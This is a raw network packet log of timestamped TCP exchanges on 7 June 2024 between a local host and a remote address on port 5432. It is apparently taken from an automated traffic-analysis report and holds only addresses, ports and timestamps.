Jun 7, 2024 17:21:16.988759041 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.988759041 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.989695072 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.990468025 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.990504026 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.990537882 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.990556955 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.990556955 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.990628958 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.992295027 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.992330074 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.992363930 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.992374897 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.992374897 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.992449999 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.994271994 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.994328022 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.994364023 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.994379044 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.994379044 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.994462967 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.996073961 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.996104956 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.996149063 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.996149063 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.997104883 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.997215986 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.997251034 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.997270107 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.997270107 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.997298956 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.998980999 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.999036074 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.999068975 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.999090910 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.999090910 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.999165058 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.000865936 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.000900984 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.000936031 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.000952959 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.000952959 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.001621008 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.002604008 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.002640009 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.002675056 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.002684116 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.002684116 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.002789974 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.004537106 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.004568100 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.004604101 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.004609108 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.004609108 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.004640102 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.004686117 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.004686117 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.006143093 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.006174088 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.006217003 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.006217003 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.006254911 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.006283998 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.006325960 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.006325960 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.007920980 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.007951975 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.007996082 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.007996082 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.008007050 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.008037090 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.008083105 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.008083105 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.009659052 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.009687901 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.009732962 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.009732962 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.009742022 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.009773016 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.009814978 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.009814978 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.011451006 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.011487961 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.011523008 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.011537075 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.011537075 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.011966944 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.013128042 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.013184071 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.013217926 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.013233900 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.013233900 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.013267994 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.014770031 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.014801025 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.014843941 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.014843941 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.014856100 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.014884949 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.014909983 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.014925957 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.016433954 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.016463995 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.016508102 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.016508102 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.016542912 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.016572952 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.016609907 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.016609907 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.018189907 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.018220901 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.018263102 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.018263102 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.018928051 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.018982887 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.018997908 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.019057989 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.019087076 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.019109964 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.019109964 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.019134045 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.020751953 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.020808935 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.020845890 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.020854950 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.020854950 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.020942926 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.022644043 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.022701025 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.022713900 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.022736073 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.022772074 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.022772074 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.023957968 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.023988962 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.024032116 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.024032116 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.024084091 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.024113894 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.024156094 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.024156094 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.025588989 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.025669098 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.025695086 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.025706053 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.025752068 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.025752068 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.027057886 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.027093887 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.027127981 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.027137995 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.027137995 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.027686119 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.028866053 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.028901100 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.028935909 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.028944969 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.028944969 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.029064894 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.030325890 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.030354977 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.030390024 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.030395031 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.030395031 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.030443907 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.030495882 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.030495882 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.031783104 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.031840086 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.031872988 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.031891108 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.031891108 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.031929016 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.033518076 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.033554077 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.033571959 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.033679008 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.033679008 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.035001993 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.035034895 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.035068989 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.035080910 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.035080910 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.035247087 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.036554098 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.036597013 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.036655903 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.036679029 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.036679029 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.036706924 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.036772013 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.036772013 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.038141966 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.038177013 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.038213968 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.038232088 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.038232088 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.038270950 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.039666891 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.039702892 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.039737940 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.039751053 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.039751053 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.039793015 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.041219950 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.041254997 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.041287899 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.041301012 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.041301012 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.041378975 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.042602062 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.042632103 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.042679071 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.042685986 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.042716026 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.042809010 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.042809010 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.044073105 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.044109106 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.044145107 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.044152975 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.044209003 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.044209003 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.045609951 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.045639992 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.045692921 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.045722961 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.045862913 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.047080040 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.047113895 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.047147989 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.047152996 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.047379971 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.048536062 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.048569918 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.048604965 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.048639059 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.048639059 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.048660994 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.049963951 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.050071001 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.050106049 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.050116062 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.050152063 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.050153017 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.051424980 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.051454067 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.051506996 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.051506996 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.051506996 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.051537991 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.051577091 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.051577091 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.053097010 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.053131104 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.053164959 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.053199053 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.053199053 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.053222895 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.054301977 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.054336071 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.054369926 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.054393053 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.054393053 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.054449081 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.055829048 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.055864096 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.055897951 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.055907011 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.055907011 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.055963993 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.057075977 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.057131052 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.057143927 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.057166100 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.057202101 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.057336092 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.058485985 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.058542013 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.058576107 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.058605909 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.058605909 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.058644056 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.059860945 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.059895992 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.059931040 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.059932947 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.059948921 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.060003042 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.061315060 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.061348915 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.061382055 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.061398029 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.061398029 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.061494112 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.062627077 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.062661886 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.062695026 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.062714100 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.062714100 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.062772989 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.064090014 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.064124107 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.064157009 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.064167023 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.064208031 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.064208031 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.065392017 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.065447092 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.065454960 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.065480947 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.065522909 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.065522909 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.066766977 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.066796064 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.066849947 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.066864967 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.066864967 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.066879034 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.066901922 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.066941977 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.068227053 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.068260908 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.068295956 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.068305016 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.068305016 CEST	49716	5432	192.168.2.5	116.202.190.18
